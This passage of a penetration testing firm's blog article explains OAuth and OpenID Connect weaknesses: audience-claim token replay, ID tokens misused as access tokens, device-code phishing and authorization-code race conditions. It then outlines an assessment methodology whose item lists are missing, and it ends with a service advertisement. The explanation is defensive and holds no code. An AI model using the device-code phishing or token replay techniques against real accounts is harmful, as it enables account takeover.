In microservice architectures, a single authorization server often issues tokens used by multiple resource servers. If the aud (audience) claim is not validated by individual resource servers, a token obtained from one service can be replayed against another. For example, an employee with access to the "reporting" service can take their access token and use it to call the "admin" service if both services trust tokens from the same authorization server and neither validates the audience.

This attack is particularly effective in Kubernetes environments where service-to-service authentication uses JWTs from a common issuer. We have demonstrated this attack in multiple engagements by intercepting a JWT from a low-privilege service and replaying it against high-privilege API endpoints.

ID Token Reuse and Replay

OIDC ID tokens are intended for authentication -- verifying the user's identity at the time of login. They are not access tokens and should not be used for authorization. However, many applications use ID tokens as bearer tokens for API access, sending them in the Authorization header with each request. This creates several problems: ID tokens may have longer lifetimes than appropriate for API access, they may not include scope or permission claims, and they are not designed to be presented to resource servers (the aud claim in an ID token is the client application, not the resource server).

When ID tokens are used as access tokens, an attacker who obtains an ID token (through any of the leakage vectors described earlier) can replay it against the API for the token's entire lifetime.

Device Authorization Flow Abuse

The OAuth 2.0 Device Authorization Grant (RFC 8628) is designed for devices with limited input capabilities (smart TVs, IoT devices). The flow presents a user code that the user enters on a different device. Phishing attacks abuse this flow by presenting the user code in a social engineering context: the attacker initiates a device authorization flow, receives the user code, and sends it to the victim via email or chat with a message like "Enter this code to verify your identity." The victim enters the code, authorizes the attacker's device, and the attacker receives tokens for the victim's account.

This attack is particularly effective against Microsoft Entra ID and has been used in real-world phishing campaigns targeting enterprise organizations. The defense is to restrict the device authorization flow to clients that actually need it and to educate users about the risk of entering device codes from unsolicited messages.

Race Conditions in Token Exchange

Some authorization servers have race conditions in their token exchange endpoints. If two simultaneous requests present the same authorization code, both may succeed and return valid tokens before the server marks the code as used. An attacker who can replay the authorization code within a narrow timing window (typically milliseconds) can obtain their own set of tokens from the same authorization code. This is a difficult attack to execute in practice but is testable by sending concurrent requests from a penetration testing tool.


A Penetration Tester's Methodology for OAuth/OIDC Assessment

When we assess OAuth/OIDC implementations during a web application penetration test, we follow a systematic methodology that covers every vulnerability class discussed in this article. This section outlines our approach for security teams looking to conduct their own assessments.

Phase 1: Reconnaissance and Flow Mapping

Before testing for vulnerabilities, we map the entire OAuth flow by intercepting every request and response using Burp Suite or a similar proxy. The key information we gather includes:

Phase 2: Redirect URI Testing

We systematically test the redirect URI validation by modifying the redirect_uri parameter in the authorization request:

Phase 3: Token Security Testing

For JWT tokens, we perform the full suite of JWT attacks:

For token storage, we inspect the browser's developer tools to determine where tokens are stored and verify the security attributes of cookies (HttpOnly, Secure, SameSite).

Phase 4: Flow Integrity Testing

We test the integrity of the OAuth flow itself:

Phase 5: API-Level Token Validation

At the resource server level, we verify:


Conclusion

OAuth 2.0 and OpenID Connect are the foundation of modern authentication and authorization. When implemented correctly, they provide a secure, flexible, and user-friendly framework for delegated access. When implemented incorrectly -- which, based on our penetration testing experience, is the majority of the time -- they create vulnerabilities that directly lead to account takeover, unauthorized data access, and privilege escalation.

The core message of this guide is that OAuth security is not about following a single best practice. It is about getting every detail right simultaneously: exact redirect URI matching, mandatory PKCE, validated state parameters, proper JWT verification, secure token storage, scope enforcement at the API level, and defense-in-depth at every step. A single missed control is often all an attacker needs.

The OAuth 2.0 Security Best Current Practice (RFC 9700) consolidates years of security research into a single, actionable document. If your OAuth implementation was built before this document existed, it almost certainly has vulnerabilities that need to be addressed. If it was built after, it may still have issues if the developers did not follow every recommendation.

Automated scanning tools detect some OAuth vulnerabilities -- they can identify the use of the implicit flow, missing Referrer-Policy headers, and tokens in localStorage. But they cannot test redirect URI bypass chains, consent screen manipulation, JWT key confusion attacks, scope escalation via parameter tampering, or the many subtle interaction effects between OAuth components. These require manual penetration testing by security professionals who understand the protocol deeply.

If your application uses OAuth 2.0 or OpenID Connect -- and it almost certainly does -- a dedicated authentication and authorization security assessment is not optional. It is the minimum standard of care for protecting your users' accounts and data.

Secure Your OAuth Implementation

Lorikeet Security's web application penetration tests include deep authentication and authorization testing -- including OAuth/OIDC flow analysis, token security validation, and consent bypass testing.

-- views
Link copied!
Lorikeet Security

Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.

Lory waving

Hi, I'm Lory! Need help finding the right service? Click to chat!